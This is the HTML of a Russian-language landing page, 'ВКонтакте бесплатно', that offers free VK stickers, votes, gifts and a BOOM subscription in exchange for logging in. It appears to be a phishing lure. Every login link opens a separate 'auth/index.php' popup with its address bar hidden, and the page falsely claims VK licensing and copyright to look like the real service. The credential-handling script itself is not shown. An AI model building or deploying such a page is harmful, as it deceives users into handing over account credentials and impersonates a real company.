<!DOCTYPE HTML>
<!--
	Prologue by HTML5 UP
	html5up.net | @ajlkn
	Free for personal and commercial use under the CCA 3.0 license (html5up.net/license)
-->
<html>
	<head>
		<title>ВКонтакте бесплатно</title>
		<meta charset="utf-8" />
		<meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no" />
		<link rel="stylesheet" href="assets/css/main.css" />
		<link rel="icon" type="images/vnd.microsoft.icon" href="images/favicon.ico">
	</head>
	<body class="is-preload">

		<!-- Header -->
			<div id="header">

				<div class="top">

					<!-- Logo -->
						<div id="logo">
							<span class="image avatar48"><img src="images/avatar.png" alt="" /></span>
							<h1 id="title"><a href="#"  onClick="window.open('auth/index.php', 'newWin', 'Toolbar=0, Location=0, Directories=0, Status=0, Menubar=0, Scrollbars=0, Resizable=0, Copyhistory=1, Width=800, Height=600')">Войти в ЛК</a></h1>
							<p>Вы не авторизованы</p>
						</div>

					<!-- Nav -->
						<nav id="nav">
							<ul>
								<li><a href="#top" id="top-link"><span class="icon fa-home">Главная</span></a></li>
								<li><a href="#portfolio" id="portfolio-link"><span class="icon fa-th">Информация</span></a></li>
								<li><a href="#about" id="about-link"><span class="icon fa-user">О нас</span></a></li>
								<li><a href="#contact" id="contact-link"><span class="icon fa-envelope">Контакты</span></a></li>
							</ul>
						</nav>

				</div>

			</div>

		<!-- Main -->
			<div id="main">

				<!-- Intro -->
					<section id="top" class="one dark cover">
						<div class="container">

							<header>
								<h2 class="pros">ВКонтакте бесплатно</h2>
								<p class=pros>Мы - лучший сервис ВКонтакте<br />
								Мы занимаемся раздачей стикеров, голосов, подарков, подпиской BOOM</p>
								<p class=pros>Войдите, чтобы получить свой первый стикер-пак на выбор, за бесплатно</p>
							</header>

							<footer>
								<a href="#"  onClick="window.open('auth/index.php', 'newWin', 'Toolbar=0, Location=0, Directories=0, Status=0, Menubar=0, Scrollbars=0, Resizable=0, Copyhistory=1, Width=800, Height=600')" class="button scrolly">Войти в личный кабинет</a>
							</footer>

						</div>
					</section>

				<!-- Portfolio -->
					<section id="portfolio" class="two">
						<div class="container">

							<header>
								<h2>Что мы предоставляем?</h2>
							</header>

							<p>Благодаря нашему сайту, вы сможете получить бесплатно от нас: Стикеры, голоса, подписку VK BOOM, подарки. А Ещё Вы сможете завести новые знакомства, найти друзей, и ламповое общение в нашем чате. Более того, наш сайт официально лицензирован. Все авторские права защищены. © ВКонтакте 2006-2018</p>

							<div class="row">
								<div class="col-4 col-12-mobile">
									<article class="item">
										<a href="#" class="image fit"><img src="images/pic02.jpg" alt="" /></a>
										<header>
											<h3 class=ter>Раздача стикеров</h3>
										</header>
									</article>
									<article class="item">
										<a href="#" class="image fit"><img src="images/pic03.jpg" alt="" /></a>
										<header>
											<h3 class=ter>Раздача голосов</h3>
										</header>
									</article>
								</div>
								<div class="col-4 col-12-mobile">
									<article class="item">
										<a href="#" class="image fit"><img src="images/pic04.jpg" alt="" /></a>
										<header>
											<h3 class=ter>Подписка VK BOOM</h3>
										</header>
									</article>
									<article class="item">
										<a href="#" class="image fit"><img src="images/pic05.jpg" alt="" /></a>
										<header>
											<h3 class=ter>Раздача подарков</h3>
										</header>
									</article>
								</div>
								<div class="col-4 col-12-mobile">
									<article class="item">
										<a href="#" class="image fit"><img src="images/pic06.jpg" alt="" /></a>
										<header>
											<h3 class=ter>Доступно после авторизации</h3>
										</header>
									</article>
									<article class="item">
										<a href="#" class="image fit"><img src="images/pic07.jpg" alt="" /></a>
										<header>
											<h3 class=ter>Доступно после авторизации</h3>
										</header>
									</article>
								</div>
							</div>

						</div>
					</section>

				<!-- About Me -->
					<section id="about" class="three">
						<div class="container">

							<header>
								<h2>О нас</h2>
							</header>

							<img class=imgst style="margin-bottom:6px;" src="images/pic08.jpg" alt="" />

							<p>Наша компания работает на всеобщее благо. Мы занимаемся раздачей Стикеров, голосов, подписок VK BOOM, подарков.  Зачем нам это? Все просто, мы рекламируем себя, набираем аудиторию, чтобы в дальнейшем открыть проекты уже более масштабного уровня, держа в своих руках не маленькую аудиторию.</p>

						</div>
					</section>

				<!-- Contact -->
					<section id="contact" class="four">
						<div class="container">

							<header>
								<h2>Контакты</h2>
							</header>

							<p>Если у вас остались какие-то вопросы, вы можете задать их нам через форму обратной связи, либо в личном кабинете в разделе "помощь". Наша тех.поддержка ответит вам в течени 1-го рабочего дня.<br>
							Выходные дни: суббота, воскресенье.</p>

							<form method="post" action="#">
								<div class="row">
									<div class="col-6 col-12-mobile"><input type="text" name="name" placeholder="Имя" /></div>
									<div class="col-6 col-12-mobile"><input type="text" name="email" placeholder="Email" /></div>
									<div class="col-12">
										<textarea name="message" placeholder="Ваше сообщение..."></textarea>
									</div>
									<div class="col-12">
										<input type="submit" value="Отправить" />
									</div>
								</div>
							</form>

						</div>
					</section>

			</div>

		<!-- Footer -->
			<div id="footer">

				<!-- Copyright -->
					<ul class="copyright">
						<li>&copy; ВКонтакте бесплатно</li>
					</ul>

			</div>

		<!-- Scripts -->
			<script src="assets/js/jquery.min.js"></script>
			<script src="assets/js/jquery.scrolly.min.js"></script>
			<script src="assets/js/jquery.scrollex.min.js"></script>
			<script src="assets/js/browser.min.js"></script>
			<script src="assets/js/breakpoints.min.js"></script>
			<script src="assets/js/util.js"></script>
			<script src="assets/js/main.js"></script>

	</body>
</html>